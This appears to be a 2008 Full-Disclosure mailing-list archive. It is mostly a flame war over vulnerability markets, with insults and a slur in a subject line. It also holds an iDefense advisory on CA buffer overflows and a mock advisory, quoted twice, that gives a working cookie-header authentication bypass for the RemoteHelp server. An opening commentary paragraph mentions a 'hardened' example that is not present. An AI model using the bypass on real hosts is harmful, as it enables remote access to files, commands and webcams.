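Two points the hardened half makes that the post only implies: the client decides which cookies it sends, so the 1970 "expires" value the server hands out on a failed login is not a logout and cannot be relied on for anything; and a session credential has to be something the server generated and remembers, not a fixed string that the source code (and therefore every attacker) already contains. The shipped default/default credentials are a separate defect the post notes and this example does not try to fix.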
From techie.micheal at gmail.com Fri Apr 4 16:30:41 2008
From: techie.micheal at gmail.com (Micheal Cottingham)
Date: Fri, 4 Apr 2008 11:30:41 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass securityconferencespamming its f****** gay
In-Reply-To: <6158bb410804040728wb271dfey16b7fd58d19dfb54@mail.gmail.com>

I too have participated in ZDI as a researcher. It is a very good program, and both the company and the researcher get what they want out of the process. The company gets the time to fix the vulnerability before everybody else finds out, and the researcher gets the recognition (and some money) for their work. It is a win-win situation.

On Fri, Apr 4, 2008 at 10:28 AM, Ureleet wrote:
> I've dealt a bit with TippingPoint and their ZDI. How about you learn how it works first, then come back and criticize it? You obviously don't understand the contest at CanSecWest, or how ZDI plays into it. I was there; it was a good conf.
>
> But you need to learn how it works before you go ranting about it.... again...
>
> On Thu, Apr 3, 2008 at 5:38 PM, n3td3v wrote:
> > [...]
From xploitable at gmail.com Fri Apr 4 17:07:44 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 4 Apr 2008 17:07:44 +0100
Subject: [Full-disclosure] Fwd: Let's outlaw mass securityconferencespamming its f****** gay
In-Reply-To: <6158bb410804040728wb271dfey16b7fd58d19dfb54@mail.gmail.com>
Message-ID: <4b6ee9310804040907p77b84f1aq72a9d1655273466c@mail.gmail.com>

On Fri, Apr 4, 2008 at 3:28 PM, Ureleet wrote:
> I've dealt a bit with TippingPoint and their ZDI. How about you learn how it works first, then come back and criticize it?

I never once mentioned anything about the Zero Day Initiative? Can you find where I mentioned the Zero Day Initiative? They have nothing to do with this; they don't spam the mailing lists to make money. All I've seen them do is disclose vulnerabilities, which is fair play e-mail. I'm a big fan of the Zero Day Initiative; I have no gripes with them whatsoever.
Regards,

n3td3v

From xploitable at gmail.com Fri Apr 4 17:37:07 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 4 Apr 2008 17:37:07 +0100
Subject: [Full-disclosure] ZDI-08-018: Apple QuickTime Run Length Encoding Heap Overflow Vulnerability
In-Reply-To: <6158bb410804040733t5907006fg75a6c32d80cff145@mail.gmail.com>
Message-ID: <4b6ee9310804040937h7d3f81cpb7a1e13312ca72d1@mail.gmail.com>

On Fri, Apr 4, 2008 at 3:33 PM, Ureleet wrote:
> Dear ZDI,
>
> Please instruct n3td3v on your process. Oh sorry, you already have, in every email alert that you send!

I never once mentioned anything about the Zero Day Initiative? Can you find where I mentioned the Zero Day Initiative? They have nothing to do with this; they don't spam the mailing lists to make money. All I've seen them do is disclose vulnerabilities, which is fair play e-mail. I'm a big fan of the Zero Day Initiative; I have no gripes with them whatsoever.

Regards,

n3td3v

From security at brvenik.com Fri Apr 4 16:47:54 2008
From: security at brvenik.com (Jason)
Date: Fri, 04 Apr 2008 11:47:54 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass securityconferencespamming its f****** gay
Message-ID: <47F64DAA.9030505@brvenik.com>

We are now close to this space being full circle. The next step is that the researchers will offer the vendor a chance to compete for the information on the vuln IP market, and as a result winning vendors can choose to keep it to themselves...
Yep, Microsoft has won and we will soon be back to non-disclosure all around.

Micheal Cottingham wrote:
> I too have participated in ZDI as a researcher. It is a very good program, and both the company and the researcher get what they want out of the process. The company gets the time to fix the vulnerability before everybody else finds out, and the researcher gets the recognition (and some money) for their work. It is a win-win situation.
>
> On Fri, Apr 4, 2008 at 10:28 AM, Ureleet wrote:
>> I've dealt a bit with TippingPoint and their ZDI. How about you learn how it works first, then come back and criticize it? You obviously don't understand the contest at CanSecWest, or how ZDI plays into it. I was there; it was a good conf.
>>
>> But you need to learn how it works before you go ranting about it.... again...

From brianli2001 at yahoo.co.uk Fri Apr 4 17:54:31 2008
From: brianli2001 at yahoo.co.uk (Brian Livingstone)
Date: Fri, 4 Apr 2008 16:54:31 +0000 (GMT)
Subject: [Full-disclosure] ZDI-08-018: Apple QuickTime Run Length Encoding Heap Overflow Vulnerability
Message-ID: <848549.85068.qm@web23306.mail.ird.yahoo.com>

Don't you have a job to go to????

----- Original Message ----
From: n3td3v
To: Ureleet; zdi-disclosures at 3com.com; full-disclosure at lists.grok.org.uk; bugtraq at securityfocus.com; n3td3v
Sent: Friday, 4 April, 2008 5:37:07 PM
Subject: Re: [Full-disclosure] ZDI-08-018: Apple QuickTime Run Length Encoding Heap Overflow Vulnerability

On Fri, Apr 4, 2008 at 3:33 PM, Ureleet wrote:
> Dear ZDI,
>
> Please instruct n3td3v on your process. Oh sorry, you already have, in every email alert that you send!

I never once mentioned anything about the Zero Day Initiative? Can you find where I mentioned the Zero Day Initiative? They have nothing to do with this; they don't spam the mailing lists to make money. All I've seen them do is disclose vulnerabilities, which is fair play e-mail.
I'm a big fan of the Zero Day Initiative; I have no gripes with them whatsoever.

Regards,

n3td3v

From techie.micheal at gmail.com Fri Apr 4 18:23:19 2008
From: techie.micheal at gmail.com (Micheal Cottingham)
Date: Fri, 4 Apr 2008 13:23:19 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass securityconferencespamming its f****** gay
In-Reply-To: <4b6ee9310804040907p77b84f1aq72a9d1655273466c@mail.gmail.com>

> Robert Lemos even http://www.securityfocus.com/news/11510 talked about vulnerability pricing when Pwn2Own was on, and even the Pwn2Own cash reward might not be enough money compared to what a vulnerability *should* be worth, taking into consideration how much profit CanSecWest makes overall from people attending the conference.

Pwn2Own was sponsored by ZDI/TippingPoint ...

On Fri, Apr 4, 2008 at 12:07 PM, n3td3v wrote:
> On Fri, Apr 4, 2008 at 3:28 PM, Ureleet wrote:
> > I've dealt a bit with TippingPoint and their ZDI. How about you learn how it works first, then come back and criticize it?
>
> I never once mentioned anything about the Zero Day Initiative? Can you find where I mentioned the Zero Day Initiative?
> They have nothing to do with this, they don't spam the mailing lists
> to make money. All i've seen them do is disclose vulnerabilities,
> which is fair play e-mail. I'm a big fan of the zero day initiative, I
> have no gripes with them whatsoever.
>
> Regards,
>
> n3td3v
>

From labs-no-reply at idefense.com Fri Apr 4 19:40:26 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Fri, 04 Apr 2008 14:40:26 -0400
Subject: [Full-disclosure] iDefense Security Advisory 04.03.08: Computer Associates Alert Notification Service Multiple RPC Buffer Overflow Vulnerabilities
Message-ID: <47F6761A.8030806@idefense.com>

iDefense Security Advisory 04.03.08
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 03, 2008

I. BACKGROUND

Computer Associates Alert Notification Server is used by several CA products, including eTrust Integrated Threat Management, to provide notifications to console users.

II. DESCRIPTION

Remote exploitation of multiple buffer overflow vulnerabilities in Computer Associates International Inc.'s Alert Notification Service may allow an authenticated attacker to execute arbitrary code with SYSTEM privileges.

The Alert Service is a component of multiple Computer Associates' products. It is used to provide status updates and notifications regarding various system events. It implements an RPC interface with GUID 3d742890-397c-11cf-9bf1-00805f88cb72.

Multiple buffer overflows exist in the handlers for various opcodes. In each case, unsafe library functions are used to copy attacker supplied data into fixed size stack buffers. By making specially crafted requests, attackers are able to cause an exploitable buffer overflow.

III. ANALYSIS

Exploitation of these vulnerabilities allows an attacker to execute arbitrary code with SYSTEM privileges. In order to exploit these vulnerabilities, it is necessary for an attacker to have valid domain credentials.

IV. DETECTION

iDefense confirmed the existence of these vulnerabilities with Computer Associates' Threat Manager for the Enterprise version 8.1. Other products that contain the Alert Notification Service are suspected to be vulnerable as well.

V. WORKAROUND

iDefense is currently unaware of any effective workaround for these issues.

VI. VENDOR RESPONSE

Computer Associates has addressed these issues by providing updates. More information is available in their advisory at the following URL.

https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=173103

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-4620 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

08/24/2007  Initial vendor notification
08/24/2007  Initial vendor response
04/03/2008  Coordinated public disclosure

IX. CREDIT

The discoverer of these vulnerabilities wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information.
Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

From ureleet at gmail.com Fri Apr 4 21:34:47 2008
From: ureleet at gmail.com (Ureleet)
Date: Fri, 4 Apr 2008 16:34:47 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass securityconferencespamming its f****** gay
In-Reply-To: <4b6ee9310804040907p77b84f1aq72a9d1655273466c@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <030b01c89543$0b481540$6401a8c0@maryl> <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com> <6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com> <004e01c89593$4cec60f0$336b880a@softpro.corp> <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com> <6158bb410804040728wb271dfey16b7fd58d19dfb54@mail.gmail.com> <4b6ee9310804040907p77b84f1aq72a9d1655273466c@mail.gmail.com>
Message-ID: <6158bb410804041334s1164c9e5v76afa5b62e44f66d@mail.gmail.com>

see:

> - Come to our conference - profit... buy our ticket, get a macbook prize.

> - Hacking challenge prize - profit... they give you $5000 and sell it
> to the vendor for a lot more.

ZDI provides the money for this. and they don't sell it back to vendor

> - Train to use our software -profit... over priced training for
> software... not interested.

don't get angry at remote-exploit because they are making money from their work. how much money do you make from posting to fd?

> On the issue of how much a vulnerability is worth, the prices are not
> regulated, we need regulation into how much a vulnerability costs,
> because the prices right now are wild. We need to take vulnerability
> pricing off the blackmarket and onto a legitimate central website for
> selling vulnerabilities, or cash rewards for disclosing a
> vulnerability to a particular company or organisation.

wabisabilabi? zdi... etc.

> Can someone post to full-disclosure a price list of what they think a
> bufferoverflow should be worth etc, and we can vote if we agree.

feel free to take that as a todo item. however, i would think it would depend on the bo.

> We can't dress up cash prizes/contests as something else as well, if a
> website is offering a $5,000 reward for a vulnerability, we need to
> know if we're being ripped off with the cash reward and how much can
> be potentially made after its sold on.

zdi doesn't sell their exploits afaik.

> Robert Lemos even http://www.securityfocus.com/news/11510 talked about
> vulnerability pricing when Pwn2Own was on, and even Pwn2Own cash
> reward might not be enough money, compared to what a vulnerability
> *should* be worth, and taking into consideration how much profit
> CanSecWest make overall from people attending the conference.

the pwn2own cash is supplied by zdi. that's what you aren't realizing.

> So you take into consideration how much a vulnerability should be
> worth, then the added worth because its a security conference of how
> much should be added on to counter the profit being made by the event.

you already said this. twice.

> However, to round off, we can't allow the mailing lists to turn into a
> vulnerability market place, full-disclosure should be for free stuff,
> and other websites and mailing lists can be setup for *money making
> schemes and auctions*.

there are. however how are the people going to know about the websites if you don't allow people to 'spam' lists with this sort of thing, mr unofficial-fd moderator?

> We shouldn't allow the money makers directly to market X... if a link
> is put on Full-Disclosure by a member of the public on the fly then
> thats ok, but I think its cheeky for the particular conference,
> contest runner or software trainer to be on the list themselves
> spamming everyone, for a profiteering agenda.

that's why its called free enterprise, it's an unmoderated list. feel free to unsubscribe if you dont like it much..

> You mention cross-posting, thats not the issue here, its the people
> making the money posting to make the money that offends me so much.

we know, its the third time youve said it in one email.

> And not even the lonely hacker offends me who posts i've got a
> vulnerability for sale for X, I don't mind that on Full-Disclosure,
> but what I do mind is if its a company or organisation doing it that
> is directly the ones making the money via vulnerability for sale,
> prize contest, security conference or train to use our software!!!,
> thats the height of spam I just think is utterly wrong and unethical
> on any scale of acceptability.

again, free market, and you are directly talking about zdi.

> If a lonely hacker who works in a supermarket has a vulnerability to
> sell i'm all for it being post on full-disclosure, but not the big
> money conferences, prize hacking contests and software training guys.

fourth time.

> I come under the bracket as supermarket worker with nothing much going
> for me in life, so I should be allowed to sell a vulnerability on
> what's meant to be a mailing list for non-profit disclosure.

you work at a supermarket? so you know about the under cash drawer switch that pops open the drawer exploit?

> You will find it easy to shout me down and say n3td3v's an idiot, but
> wait to the vulnerability market really takes off and the prices of
> vulnerabilities are properly defined and regulated, you're going to
> see a huge increase in commercial spam on the mailing lists, like the
> full-disclosure mailing list. so we've got to define what's fair play
> e-mail and what's a company or organisation blatantly profiteering
> with X method of extracting money out of people and using skilled
> hackers to make money, and to promote a security conference, training
> etc.

again, unmoderated list. the door is over there.

From ureleet at gmail.com Fri Apr 4 21:35:11 2008
From: ureleet at gmail.com (Ureleet)
Date: Fri, 4 Apr 2008 16:35:11 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass securityconferencespamming its f****** gay
In-Reply-To:
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <030b01c89543$0b481540$6401a8c0@maryl> <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com> <6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com> <004e01c89593$4cec60f0$336b880a@softpro.corp> <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com> <6158bb410804040728wb271dfey16b7fd58d19dfb54@mail.gmail.com> <4b6ee9310804040907p77b84f1aq72a9d1655273466c@mail.gmail.com>
Message-ID: <6158bb410804041335q727dc069lb578cb43691671ef@mail.gmail.com>

i was hoping he'd realize that

On Fri, Apr 4, 2008 at 1:23 PM, Micheal Cottingham wrote:
> Robert Lemos even http://www.securityfocus.com/news/11510 talked about
> vulnerability pricing when Pwn2Own was on, and even Pwn2Own cash
> reward might not be enough money, compared to what a vulnerability
> *should* be worth, and taking into consideration how much profit
> CanSecWest make overall from people attending the conference.
> [/quote]
>
> Pwn2Own was sponsored by ZDI/TippingPoint ...
>
> On Fri, Apr 4, 2008 at 12:07 PM, n3td3v wrote:
> > On Fri, Apr 4, 2008 at 3:28 PM, Ureleet wrote:
> > > ive dealt a bit with tipping point and their zdi. how about you
> > > learn how it works first, then come back and criticize it?
> >
> > I never once mentioned anything about the zero day initiative? Can you
> > find where I mentioned about the zero day initiative.
> > They have nothing to do with this, they don't spam the mailing lists
> > to make money. All i've seen them do is disclose vulnerabilities,
> > which is fair play e-mail. I'm a big fan of the zero day initiative, I
> > have no gripes with them whatsoever.
> >
> > Regards,
> >
> > n3td3v
> >
>

From ureleet at gmail.com Fri Apr 4 21:36:05 2008
From: ureleet at gmail.com (Ureleet)
Date: Fri, 4 Apr 2008 16:36:05 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass securityconferencespamming its f****** gay
In-Reply-To: <47F64DAA.9030505@brvenik.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <030b01c89543$0b481540$6401a8c0@maryl> <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com> <6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com> <004e01c89593$4cec60f0$336b880a@softpro.corp> <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com> <6158bb410804040728wb271dfey16b7fd58d19dfb54@mail.gmail.com> <47F64DAA.9030505@brvenik.com>
Message-ID: <6158bb410804041336p2fc9e424n8aa9a54d946a8859@mail.gmail.com>

arent we already there?

On Fri, Apr 4, 2008 at 11:47 AM, Jason wrote:
> We are now close to this space being full circle. The next step is that
> the researchers will offer the vendor a chance to compete for the
> information on the vuln IP market and as a result winning vendors can
> choose to keep it to themselves...
>
> Yep, Microsoft has won and we will soon be back to non-disclosure all
> around.
>
> Micheal Cottingham wrote:
> > I too have participated in ZDI as a researcher. It is a very good
> > program, and both the company and the researcher get what they want
> > out of the process. The company gets the time to fix the vulnerability
> > before everybody else finds out, and the researcher gets the
> > recognition (and some money) for their work. It is a win-win
> > situation.
> >
> > On Fri, Apr 4, 2008 at 10:28 AM, Ureleet wrote:
> >> ive dealt a bit with tipping point and their zdi. how about you learn
> >> how it works first, then come back and criticize it? you obviously dont
> >> understand the contest at cansecwest, or how zdi plays into it. i was
> >> there, it was a good conf.
> >>
> >> but you need to learn how it works before you go ranting about it....
> >> again...
> >>
> >>
>

From ureleet at gmail.com Fri Apr 4 21:37:06 2008
From: ureleet at gmail.com (Ureleet)
Date: Fri, 4 Apr 2008 16:37:06 -0400
Subject: [Full-disclosure] ZDI-08-018: Apple QuickTime Run Length Encoding Heap Overflow Vulnerability
In-Reply-To: <4b6ee9310804040937h7d3f81cpb7a1e13312ca72d1@mail.gmail.com>
References: <6158bb410804040733t5907006fg75a6c32d80cff145@mail.gmail.com> <4b6ee9310804040937h7d3f81cpb7a1e13312ca72d1@mail.gmail.com>
Message-ID: <6158bb410804041337m563d8072p87752f5736eb63fb@mail.gmail.com>

see my other email, i'm not cross threading like you.

On Fri, Apr 4, 2008 at 12:37 PM, n3td3v wrote:
> On Fri, Apr 4, 2008 at 3:33 PM, Ureleet wrote:
> > dear zdi,
> >
> > please instruct n3td3v on your process. oh sorry you already have in
> > every email alert that you send!
>
> I never once mentioned anything about the zero day initiative? Can you
> find where I mentioned about the zero day initiative.
> They have nothing to do with this, they don't spam the mailing lists
> to make money. All i've seen them do is disclose vulnerabilities,
> which is fair play e-mail. I'm a big fan of the zero day initiative, I
> have no gripes with them whatsoever.
>
> Regards,
>
> n3td3v
>

From ureleet at gmail.com Fri Apr 4 21:37:56 2008
From: ureleet at gmail.com (Ureleet)
Date: Fri, 4 Apr 2008 16:37:56 -0400
Subject: [Full-disclosure] n3td3v agenda & Solid Information Security State Release 0012
In-Reply-To: <805292.91098.qm@web23315.mail.ird.yahoo.com>
References: <805292.91098.qm@web23315.mail.ird.yahoo.com>
Message-ID: <6158bb410804041337j5fbb8c2cqf34c5f9af1e72478@mail.gmail.com>

r u serious?
On Fri, Apr 4, 2008 at 10:48 AM, Micheal Turner wrote:
> n3td3v agenda & Cyber Security group
> ====================================
>
> Solid Information Security State Release #0012a
>
> MARKING: RESTRICTIONS APPLY.
> FAO: WORLD LEADERS
>
> == Introduction ==
> Serious high-risk ultra critical vulnerability has
> been identified in Remote Help application that may be
> used by CIA, NSA and FBI employees when helping
> colleagues on anti-terror campaigns. RemoteHelp is a
> minimal http server that allows to view and control a
> remote pc running a 32-bit version of Microsoft
> Windows.
> current version is 0.0.6 and runs stand-alone or
> installs as a service.
>
> == URL ==
> http://sourceforge.net/projects/remotehelp/
>
> == HISTORY ==
> After n3td3v agenda emailed the NSA, SANS and all
> information security groups and was found not to be
> taken seriously. High risk proof of concept exploit
> code has been authored for severe vulnerability in
> Remote Help application which may be used by any number
> of Yahoo!, Google!, Ebay! or NSA employees. This
> vulnerability gives rise to serious national
> infrastructure risk and should not be underestimated!
>
> == Proof of Concept ==
> I found a vulnerability in the pages.c file which
> generates the login page dialog and authenticates a
> user after it checks if your "user" and "pass"
> parameter match the defaults
> (user/default) it does this:
>
> strncpy(cookie,"user=default; path=/; expires=Sun,
> 11-May-2030 22:11:40 GMT",1024);
>
> for a valid login and for an invalid login it sets an
> expired cookie like so;
> strncpy(cookie,"user=default; path=/; expires=Sun,
> 11-May-1970 22:11:40 GMT",1024);
>
> all you have to do is add "Cookie: user=default;
> path=/; expires=Sun, 11-May-2030 22:11:40 GMT" to your
> HTTP request and you can bypass
> authentication to the Remote Help server and access
> the filesystem/exec commands/view the webcam of the
> hosts running it.
>
> == Credit ==
>
> n3td3v & documentation help by Michael Turner.
>
> "Never trust your employees."
>

From razishaban at gmail.com Fri Apr 4 22:41:26 2008
From: razishaban at gmail.com (Razi Shaban)
Date: Sat, 5 Apr 2008 00:41:26 +0300
Subject: [Full-disclosure] n3td3v agenda & Solid Information Security State Release 0012
In-Reply-To: <6158bb410804041337j5fbb8c2cqf34c5f9af1e72478@mail.gmail.com>
References: <805292.91098.qm@web23315.mail.ird.yahoo.com> <6158bb410804041337j5fbb8c2cqf34c5f9af1e72478@mail.gmail.com>
Message-ID: <2d792fb20804041441i31259485xefcc8ec761b3761e@mail.gmail.com>

It's called "a joke."

--
Razi

On 4/4/08, Ureleet wrote:
> r u serious?
>
> On Fri, Apr 4, 2008 at 10:48 AM, Micheal Turner wrote:
> > n3td3v agenda & Cyber Security group
> > ====================================
> >
> > Solid Information Security State Release #0012a
> >
> > MARKING: RESTRICTIONS APPLY.
> > FAO: WORLD LEADERS
> >
> > == Introduction ==
> > Serious high-risk ultra critical vulnerability has
> > been identified in Remote Help application that may be
> > used by CIA, NSA and FBI employees when helping
> > colleagues on anti-terror campaigns. RemoteHelp is a
> > minimal http server that allows to view and control a
> > remote pc running a 32-bit version of Microsoft
> > Windows.
> > current version is 0.0.6 and runs stand-alone or
> > installs as a service.
> >
> > == URL ==
> > http://sourceforge.net/projects/remotehelp/
> >
> > == HISTORY ==
> > After n3td3v agenda emailed the NSA, SANS and all
> > information security groups and was found not to be
> > taken seriously. High risk proof of concept exploit
> > code has been authored for severe vulnerability in
> > Remote Help application which may be used by any number
> > of Yahoo!, Google!, Ebay! or NSA employees. This
> > vulnerability gives rise to serious national
> > infrastructure risk and should not be underestimated!
> >
> > == Proof of Concept ==
> > I found a vulnerability in the pages.c file which
> > generates the login page dialog and authenticates a
> > user after it checks if your "user" and "pass"
> > parameter match the defaults
> > (user/default) it does this:
> >
> > strncpy(cookie,"user=default; path=/; expires=Sun,
> > 11-May-2030 22:11:40 GMT",1024);
> >
> > for a valid login and for an invalid login it sets an
> > expired cookie like so;
> > strncpy(cookie,"user=default; path=/; expires=Sun,
> > 11-May-1970 22:11:40 GMT",1024);
> >
> > all you have to do is add "Cookie: user=default;
> > path=/; expires=Sun, 11-May-2030 22:11:40 GMT" to your
> > HTTP request and you can bypass
> > authentication to the Remote Help server and access
> > the filesystem/exec commands/view the webcam of the
> > hosts running it.
> >
> > == Credit ==
> >
> > n3td3v & documentation help by Michael Turner.
> >
> > "Never trust your employees."
> >
>

From xploitable at gmail.com Fri Apr 4 23:11:01 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 4 Apr 2008 23:11:01 +0100
Subject: [Full-disclosure] Fwd: Let's outlaw mass securityconferencespamming its f****** gay
In-Reply-To: <6158bb410804041334s1164c9e5v76afa5b62e44f66d@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <030b01c89543$0b481540$6401a8c0@maryl> <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com> <6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com> <004e01c89593$4cec60f0$336b880a@softpro.corp> <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com> <6158bb410804040728wb271dfey16b7fd58d19dfb54@mail.gmail.com> <4b6ee9310804040907p77b84f1aq72a9d1655273466c@mail.gmail.com> <6158bb410804041334s1164c9e5v76afa5b62e44f66d@mail.gmail.com>
Message-ID: <4b6ee9310804041511i32365f33g3dcdc9ef34a02e5c@mail.gmail.com>

On Fri, Apr 4, 2008 at 9:34 PM, Ureleet wrote:
> see:
>
> > - Come to our conference - profit... buy our ticket, get a macbook prize.
>
> > - Hacking challenge prize - profit... they give you $5000 and sell it
> > to the vendor for a lot more.
>
> ZDI provides the money for this. and they don't sell it back to vendor
>
> > - Train to use our software -profit... over priced training for
> > software... not interested.
>
> don't get angry at remote-exploit because they are making money from their
> work. how much money do you make from posting to fd?
>
> > On the issue of how much a vulnerability is worth, the prices are not
> > regulated, we need regulation into how much a vulnerability costs,
> > because the prices right now are wild. We need to take vulnerability
> > pricing off the blackmarket and onto a legitimate central website for
> > selling vulnerabilities, or cash rewards for disclosing a
> > vulnerability to a particular company or organisation.
>
> wabisabilabi? zdi... etc.
>
> > Can someone post to full-disclosure a price list of what they think a
> > bufferoverflow should be worth etc, and we can vote if we agree.
>
> feel free to take that as a todo item. however, i would think it would
> depend on the bo.
>
> > We can't dress up cash prizes/contests as something else as well, if a
> > website is offering a $5,000 reward for a vulnerability, we need to
> > know if we're being ripped off with the cash reward and how much can
> > be potentially made after its sold on.
>
> zdi doesn't sell their exploits afaik.
>
> > Robert Lemos even http://www.securityfocus.com/news/11510 talked about
> > vulnerability pricing when Pwn2Own was on, and even Pwn2Own cash
> > reward might not be enough money, compared to what a vulnerability
> > *should* be worth, and taking into consideration how much profit
> > CanSecWest make overall from people attending the conference.
>
> the pwn2own cash is supplied by zdi. that's what you aren't realizing.
>
> > So you take into consideration how much a vulnerability should be
> > worth, then the added worth because its a security conference of how
> > much should be added on to counter the profit being made by the event.
>
> you already said this. twice.
>
> > However, to round off, we can't allow the mailing lists to turn into a
> > vulnerability market place, full-disclosure should be for free stuff,
> > and other websites and mailing lists can be setup for *money making
> > schemes and auctions*.
>
> there are. however how are the people going to know about the websites if
> you don't allow people to 'spam' lists with this sort of thing, mr
> unofficial-fd moderator?
>
> > We shouldn't allow the money makers directly to market X... if a link
> > is put on Full-Disclosure by a member of the public on the fly then
> > thats ok, but I think its cheeky for the particular conference,
> > contest runner or software trainer to be on the list themselves
> > spamming everyone, for a profiteering agenda.
>
> that's why its called free enterprise, it's an unmoderated list. feel free
> to unsubscribe if you dont like it much..
>
> > You mention cross-posting, thats not the issue here, its the people
> > making the money posting to make the money that offends me so much.
>
> we know, its the third time youve said it in one email.
>
> > And not even the lonely hacker offends me who posts i've got a
> > vulnerability for sale for X, I don't mind that on Full-Disclosure,
> > but what I do mind is if its a company or organisation doing it that
> > is directly the ones making the money via vulnerability for sale,
> > prize contest, security conference or train to use our software!!!,
> > thats the height of spam I just think is utterly wrong and unethical
> > on any scale of acceptability.
>
> again, free market, and you are directly talking about zdi.
>
> > If a lonely hacker who works in a supermarket has a vulnerability to
> > sell i'm all for it being post on full-disclosure, but not the big
> > money conferences, prize hacking contests and software training guys.
>
> fourth time.
>
> > I come under the bracket as supermarket worker with nothing much going
> > for me in life, so I should be allowed to sell a vulnerability on
> > what's meant to be a mailing list for non-profit disclosure.
>
> you work at a supermarket? so you know about the under cash drawer switch
> that pops open the drawer exploit?
>
> > You will find it easy to shout me down and say n3td3v's an idiot, but
> > wait to the vulnerability market really takes off and the prices of
> > vulnerabilities are properly defined and regulated, you're going to
> > see a huge increase in commercial spam on the mailing lists, like the
> > full-disclosure mailing list. so we've got to define what's fair play
> > e-mail and what's a company or organisation blatantly profiteering
> > with X method of extracting money out of people and using skilled
> > hackers to make money, and to promote a security conference, training
> > etc.
>
> again, unmoderated list. the door is over there.

* i * * never * mentioned * ZDI * you * complete * jerk * off *

* read * * the * * e-mail * properly * and * you * will * understand * what * I * don't * like *

Overview:

FIRST

I said let's have a debate about how much a vulnerability is worth per vulnerability type, so everyone knows if we're being ripped off by joe jobs and to stop any blackmarkets, prices need to be defined and regulated, so everyone knows where they stand in the security community as far as prices are concerned.

^^^^You bypassed this completely.

SECOND

Those on the list who don't disclose a vulnerability *but* are trying to sell a product should be outlawed.

^^^^do you know the difference between disclosure and profiteering?

You're losing my rag and the lack of intellectual debate on this from non-retards is shocking, these are two serious topics that need debating and all i've got is some lamer called "Ureleet" trying to wind me up.

Is there anyone who can have a serious debate on this list?
n3td3v

From razishaban at gmail.com Fri Apr 4 23:19:50 2008
From: razishaban at gmail.com (Razi Shaban)
Date: Sat, 5 Apr 2008 01:19:50 +0300
Subject: [Full-disclosure] Fwd: Let's outlaw mass securityconferencespamming its f****** gay
In-Reply-To: <4b6ee9310804041511i32365f33g3dcdc9ef34a02e5c@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com> <82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com> <6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com> <004e01c89593$4cec60f0$336b880a@softpro.corp> <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com> <6158bb410804040728wb271dfey16b7fd58d19dfb54@mail.gmail.com> <4b6ee9310804040907p77b84f1aq72a9d1655273466c@mail.gmail.com> <6158bb410804041334s1164c9e5v76afa5b62e44f66d@mail.gmail.com> <4b6ee9310804041511i32365f33g3dcdc9ef34a02e5c@mail.gmail.com>
Message-ID: <2d792fb20804041519q2f9bea81j9304ae9446414a03@mail.gmail.com>

You say "serious debate" as if you are attempting to partake in such a debate. You are not. You are flaming. Now, please stop flaming.

Note for fairness: This is not intended exclusively for netdev, but for everyone who is flaming.

--
Razi

On 4/5/08, n3td3v wrote:
> On Fri, Apr 4, 2008 at 9:34 PM, Ureleet wrote:
> > see:
> >
> > > - Come to our conference - profit... buy our ticket, get a macbook prize.
> >
> > > - Hacking challenge prize - profit... they give you $5000 and sell it
> > > to the vendor for a lot more.
> >
> > ZDI provides the money for this. and they don't sell it back to vendor
> >
> > > - Train to use our software -profit... over priced training for
> > > software... not interested.
> >
> > don't get angry at remote-exploit because they are making money from their
> > work. how much money do you make from posting to fd?
> >
> > > On the issue of how much a vulnerability is worth, the prices are not
> > > regulated, we need regulation into how much a vulnerability costs,
> > > because the prices right now are wild. We need to take vulnerability
> > > pricing off the blackmarket and onto a legitimate central website for
> > > selling vulnerabilities, or cash rewards for disclosing a
> > > vulnerability to a particular company or organisation.
> >
> > wabisabilabi? zdi... etc.
> >
> > > Can someone post to full-disclosure a price list of what they think a
> > > bufferoverflow should be worth etc, and we can vote if we agree.
> >
